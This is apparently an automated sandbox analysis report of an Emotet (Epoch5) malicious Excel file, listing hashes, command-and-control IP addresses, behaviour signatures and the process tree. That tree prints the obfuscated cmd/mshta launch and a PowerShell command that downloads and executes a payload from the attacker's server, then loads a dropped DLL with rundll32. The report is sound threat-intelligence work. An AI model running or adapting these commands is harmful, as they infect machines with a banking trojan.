Analysis

  • max time kernel
    121s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 00:50

General

  • Target

    file 923.xls

  • Size

    36KB

  • MD5

    d2e3fb32e4e815fe2af7c7e49d85cdb1

  • SHA1

    92533e7563698f9e5e0960d182cf74b03f00a8fb

  • SHA256

    3d9d856f454202dd099b997b079c0edb6c3b1e2e2379d22cb042a0bde92daa95

  • SHA512

    285ad6c939be79e8c212615b161264494748c25bf6cf918101fae8e6c3c06a8d2c374b490d9ce3f473855bc23e41c355932a54c8420adaaf70c05087628d9e06

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/oo/aa/se.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/oo/aa/se.png

Extracted

Family

emotet

Botnet

Epoch5

C2

159.69.43.124:8080

45.79.80.198:443

207.148.81.119:8080

128.199.192.135:8080

118.98.72.86:443

217.182.143.207:443

168.197.250.14:80

116.124.128.206:8080

78.46.73.125:443

185.148.168.15:8080

195.154.146.35:443

85.214.67.203:8080

194.9.172.107:8080

59.148.253.194:443

210.57.209.142:8080

54.38.242.185:443

195.77.239.39:8080

159.69.237.188:443

104.131.62.48:8080

62.171.178.147:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\file 923.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/oo/aa/se.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:1428
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3976
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3872
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3840
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1720
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cmdfjzwbyythjygd\viwyxdfnn.uzn",fDthiXrsqW
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1140
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cmdfjzwbyythjygd\viwyxdfnn.uzn",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2864
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1428 -s 1652
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3364

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    7c8d78edc5626bd61591523c9c963b1e

    SHA1

    4f05391deedd6b55544f5de3a2c47ac88870436a

    SHA256

    9f9c2de509478a4400f67b680e48c191053d90abdd9f13937344fc621925b3ab

    SHA512

    0bd959c8beb030c829278aa12f6b2965d09a1d04faeb91ab135744eb6bd4ecd24ae28902542d03f742b3f2a9060f56ccf29c376f5dab2b9a73fc893131a2c369

  • \ProgramData\QWER.dll
    MD5

    7c8d78edc5626bd61591523c9c963b1e

    SHA1

    4f05391deedd6b55544f5de3a2c47ac88870436a

    SHA256

    9f9c2de509478a4400f67b680e48c191053d90abdd9f13937344fc621925b3ab

    SHA512

    0bd959c8beb030c829278aa12f6b2965d09a1d04faeb91ab135744eb6bd4ecd24ae28902542d03f742b3f2a9060f56ccf29c376f5dab2b9a73fc893131a2c369

  • \ProgramData\QWER.dll
    MD5

    7c8d78edc5626bd61591523c9c963b1e

    SHA1

    4f05391deedd6b55544f5de3a2c47ac88870436a

    SHA256

    9f9c2de509478a4400f67b680e48c191053d90abdd9f13937344fc621925b3ab

    SHA512

    0bd959c8beb030c829278aa12f6b2965d09a1d04faeb91ab135744eb6bd4ecd24ae28902542d03f742b3f2a9060f56ccf29c376f5dab2b9a73fc893131a2c369

  • memory/1008-129-0x00007FF8ABF00000-0x00007FF8ABF10000-memory.dmp
    Filesize

    64KB

  • memory/1008-119-0x00007FF8AEA50000-0x00007FF8AEA60000-memory.dmp
    Filesize

    64KB

  • memory/1008-128-0x00007FF8ABF00000-0x00007FF8ABF10000-memory.dmp
    Filesize

    64KB

  • memory/1008-118-0x00007FF8AEA50000-0x00007FF8AEA60000-memory.dmp
    Filesize

    64KB

  • memory/1008-399-0x00007FF8AEA50000-0x00007FF8AEA60000-memory.dmp
    Filesize

    64KB

  • memory/1008-398-0x00007FF8AEA50000-0x00007FF8AEA60000-memory.dmp
    Filesize

    64KB

  • memory/1008-397-0x00007FF8AEA50000-0x00007FF8AEA60000-memory.dmp
    Filesize

    64KB

  • memory/1008-396-0x00007FF8AEA50000-0x00007FF8AEA60000-memory.dmp
    Filesize

    64KB

  • memory/1008-115-0x00007FF8AEA50000-0x00007FF8AEA60000-memory.dmp
    Filesize

    64KB

  • memory/1008-117-0x00007FF8AEA50000-0x00007FF8AEA60000-memory.dmp
    Filesize

    64KB

  • memory/1008-116-0x00007FF8AEA50000-0x00007FF8AEA60000-memory.dmp
    Filesize

    64KB

  • memory/1140-353-0x00000000032E0000-0x0000000003307000-memory.dmp
    Filesize

    156KB

  • memory/1720-356-0x00000000053E0000-0x0000000005407000-memory.dmp
    Filesize

    156KB

  • memory/1720-352-0x0000000005220000-0x0000000005247000-memory.dmp
    Filesize

    156KB

  • memory/1720-341-0x0000000003030000-0x0000000003057000-memory.dmp
    Filesize

    156KB

  • memory/1720-343-0x0000000003140000-0x0000000003167000-memory.dmp
    Filesize

    156KB

  • memory/1720-346-0x0000000005000000-0x0000000005027000-memory.dmp
    Filesize

    156KB

  • memory/1720-348-0x0000000005160000-0x0000000005187000-memory.dmp
    Filesize

    156KB

  • memory/1720-350-0x00000000051C0000-0x00000000051E7000-memory.dmp
    Filesize

    156KB

  • memory/2864-366-0x0000000004930000-0x0000000004957000-memory.dmp
    Filesize

    156KB

  • memory/2864-360-0x0000000004810000-0x0000000004837000-memory.dmp
    Filesize

    156KB

  • memory/2864-362-0x0000000004870000-0x0000000004897000-memory.dmp
    Filesize

    156KB

  • memory/2864-364-0x00000000048D0000-0x00000000048F7000-memory.dmp
    Filesize

    156KB

  • memory/2864-368-0x00000000049A0000-0x00000000049C7000-memory.dmp
    Filesize

    156KB

  • memory/2864-370-0x0000000004A20000-0x0000000004A47000-memory.dmp
    Filesize

    156KB

  • memory/3840-339-0x00000000041A0000-0x00000000041C7000-memory.dmp
    Filesize

    156KB

  • memory/3976-325-0x000001F72EBC0000-0x000001F72EC40000-memory.dmp
    Filesize

    512KB

  • memory/3976-312-0x000001F7491C0000-0x000001F749236000-memory.dmp
    Filesize

    472KB

  • memory/3976-301-0x000001F748C70000-0x000001F748CAC000-memory.dmp
    Filesize

    240KB

  • memory/3976-284-0x000001F72EBC0000-0x000001F72EC40000-memory.dmp
    Filesize

    512KB

  • memory/3976-283-0x000001F72EBC0000-0x000001F72EC40000-memory.dmp
    Filesize

    512KB

  • memory/3976-280-0x000001F730560000-0x000001F730582000-memory.dmp
    Filesize

    136KB